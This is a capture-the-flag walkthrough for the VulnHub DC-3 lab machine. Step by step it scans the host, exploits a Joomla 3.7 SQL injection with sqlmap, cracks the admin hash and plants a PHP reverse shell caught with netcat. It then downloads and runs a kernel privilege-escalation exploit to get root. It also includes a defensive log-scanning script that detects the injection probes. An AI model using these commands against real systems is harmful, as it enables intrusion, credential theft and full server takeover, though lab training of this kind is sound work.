Machine Link : https://www.vulnhub.com/entry/dc-32,312/
STEP1
nmap 192.168.31.62 -p- -Pn -A -T4
FINDING
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
------------------------------------------------------------------------------------------------------------
STEP2
dirb http://192.168.31.62/
dirb http://192.168.31.62/ -X .txt
FINDING
== DIRECTORY: http://192.168.31.62/administrator/
http://192.168.31.62/README.txt
* Joomla! 3.7 version history - https://docs.joomla.org/Joomla_3.7_version_history
------------------------------------------------------------------------------------------------------------
STEP3
search Google for a Joomla 3.7 exploit
FINDING
https://www.exploit-db.com/exploits/42033
------------------------------------------------------------------------------------------------------------
STEP4
sqlmap -u "http://192.168.31.62/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
FINDING
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
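Defender-side counterpart to the sqlmap step above, added here as an example and not part of the original walkthrough: it scans Apache combined-format access log lines for requests to com_fields whose list[fullordering] value is not the plain "column ASC|DESC" form Joomla's UI sends. Because sqlmap was run with --random-agent, the check keys on the parameter value rather than the User-Agent. The log lines, the client IP 192.168.31.50 and the log format are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Joomla's own list[fullordering] values look like "a.id ASC" / "a.title DESC".
LEGIT_ORDERING = re.compile(
    r"^[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)?(\s+(ASC|DESC))?$", re.I)
# SQL functions commonly seen in error-based probes against this parameter.
SQLI_MARKERS = re.compile(r"updatexml|extractvalue|concat\(|sleep\(|benchmark\(", re.I)

# Apache "combined" log format (assumed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')

# Constructed sample lines: one normal page load, one legitimate sort,
# and two probes sent with different (randomised) user agents.
SAMPLE_LOG = """\
192.168.31.50 - - [10/Mar/2024:10:01:02 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.31.50 - - [10/Mar/2024:10:01:05 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml HTTP/1.1" 500 1234 "-" "Mozilla/5.0 (Windows NT 10.0)"
192.168.31.50 - - [10/Mar/2024:10:01:06 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.id%20ASC HTTP/1.1" 200 5120 "-" "curl/7.68.0"
192.168.31.50 - - [10/Mar/2024:10:01:07 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=(updatexml(1%2C1%2C1)) HTTP/1.1" 500 1200 "-" "Opera/9.80"
"""

def inspect_line(line):
    """Return (ip, user_agent, reason, value) for a suspicious com_fields request, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    # parse_qs percent-decodes, so list%5Bfullordering%5D becomes list[fullordering].
    qs = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    if qs.get("option", [""])[0] != "com_fields":
        return None
    for value in qs.get("list[fullordering]", []):
        if SQLI_MARKERS.search(value):
            return (m["ip"], m["ua"], "sql function in ordering parameter", value)
        if not LEGIT_ORDERING.match(value):
            return (m["ip"], m["ua"], "ordering value not in 'column ASC|DESC' form", value)
    return None

def scan(log_text):
    """All suspicious requests in the log, in order of appearance."""
    return [hit for hit in map(inspect_line, log_text.splitlines()) if hit]

def sources(hits):
    """Group suspicious requests by client IP; the set of UAs per IP exposes --random-agent."""
    by_ip = {}
    for ip, ua, _reason, _value in hits:
        by_ip.setdefault(ip, set()).add(ua)
    return by_ip

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```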
------------------------------------------------------------------------------------------------------------
STEP5
sqlmap -u "http://192.168.31.62/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables --batch
Database: joomladb
[76 tables]
+---------------------+
| #__assets |
| #__associations |
| #__banner_clients |
| #__banner_tracks |
| #__banners |
| #__bsms_admin |
| #__bsms_books |
| #__bsms_comments |
| #__bsms_locations |
| #__bsms_mediafiles |
| #__bsms_message_typ |
| #__bsms_podcast |
| #__bsms_series |
| #__bsms_servers |
| #__bsms_studies |
| #__bsms_studytopics |
| #__bsms_teachers |
| #__bsms_templatecod |
| #__bsms_templates |
| #__bsms_timeset |
| #__bsms_topics |
| #__bsms_update |
| #__categories |
| #__contact_details |
| #__content_frontpag |
| #__content_rating |
| #__content_types |
| #__content |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions |
| #__fields_categorie |
| #__fields_groups |
| #__fields_values |
| #__fields |
| #__finder_filters |
| #__finder_links_ter |
| #__finder_links |
| #__finder_taxonomy_ |
| #__finder_taxonomy |
| #__finder_terms_com |
| #__finder_terms |
| #__finder_tokens_ag |
| #__finder_tokens |
| #__finder_types |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages |
| #__menu_types |
| #__menu |
| #__messages_cfg |
| #__messages |
| #__modules_menu |
| #__modules |
| #__newsfeeds |
| #__overrider |
| #__postinstall_mess |
| #__redirect_links |
| #__schemas |
| #__session |
| #__tags |
| #__template_styles |
| #__ucm_base |
| #__ucm_content |
| #__ucm_history |
| #__update_sites_ext |
| #__update_sites |
| #__updates |
| #__user_keys |
| #__user_notes |
| #__user_profiles |
| #__user_usergroup_m |
| #__usergroups |
| #__users |
| #__utf8_conversion |
| #__viewlevels |
+---------------------+
------------------------------------------------------------------------------------------------------------
STEP6
sqlmap -u "http://192.168.31.62/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T #__users -C name,password --dump --batch
FINDING
Table: #__users
[1 entry]
+--------+--------------------------------------------------------------+
| name | password |
+--------+--------------------------------------------------------------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+--------+--------------------------------------------------------------+
echo '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu' > dc3hash.txt
john dc3hash.txt
snoopy -- is the password
------------------------------------------------------------------------------------------------------------
STEP7
http://192.168.31.62/administrator/
log in as admin with the password snoopy
------------------------------------------------------------------------------------------------------------
STEP8
visit -- http://192.168.31.62/administrator/index.php?option=com_templates&view=template&id=503&file=L2luZGV4LnBocA%3D%3D
edit index.php
replace all of the code with PHP reverse shell code
save it
then, in a new terminal
nc -nvlp 1234
in a new browser tab, open
http://192.168.31.62/templates/beez3/index.php
the reverse shell connects back
------------------------------------------------------------------------------------------------------------
STEP9
in the shell
python -c 'import pty; pty.spawn("/bin/bash")'
uname -a
lsb_release -a
FINDING
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
------------------------------------------------------------------------------------------------------------
STEP10
in a new terminal
searchsploit ubuntu 16.04
FINDING
Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() bpf(BPF_PROG_LOAD) Privilege Es | linux/local/39772.txt
------------------------------------------------------------------------------------------------------------
STEP11
search Exploit-DB
https://www.exploit-db.com/exploits/39772
at the bottom of the exploit text you will find the download link
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
in the nc terminal
cd /tmp
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
unzip 39772
ls
FINDING
Archive: 39772.zip
creating: 39772/
inflating: 39772/.DS_Store
creating: __MACOSX/
creating: __MACOSX/39772/
inflating: __MACOSX/39772/._.DS_Store
inflating: 39772/crasher.tar
inflating: __MACOSX/39772/._crasher.tar
inflating: 39772/exploit.tar
inflating: __MACOSX/39772/._exploit.tar
------------------------------------------------------------------------------------------------------------
STEP12
important files:
inflating: __MACOSX/39772/._exploit.tar
inflating: __MACOSX/39772/._crasher.tar
in the nc terminal
tar -xvf exploit.tar
ls
cd ebpf_mapfd_doubleput_exploit
FINDING
compile.sh
doubleput
doubleput.c
hello
hello.c
suidhelper
suidhelper.c
------------------------------------------------------------------------------------------------------------
STEP13
./compile.sh
./doubleput
whoami
root
cd /root
ls
the-flag.txt
cat the-flag.txt
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| _ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
Congratulations are in order. :-)
I hope youve enjoyed this challenge as I enjoyed making it.
If there are any ways that I can improve these little challenges,
please let me know.
As per usual, comments and complaints can be sent via Twitter to @DCAU7
Have a great day!!!!
-------------------------------------------------------------------------------------------------------------